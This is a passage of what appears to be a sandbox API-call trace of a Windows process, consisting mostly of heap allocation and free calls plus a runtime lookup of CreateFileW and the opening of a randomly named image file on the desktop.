returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0121.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0121.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0121.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0121.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0121.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0121.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0121.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0121.305] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0121.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0121.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0121.308] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0121.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0121.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0121.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0121.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0121.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0121.310] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0121.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0121.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0121.311] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0121.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0121.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0121.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bbxrq2nhzpp_a.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0121.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0121.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0121.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0121.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0121.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 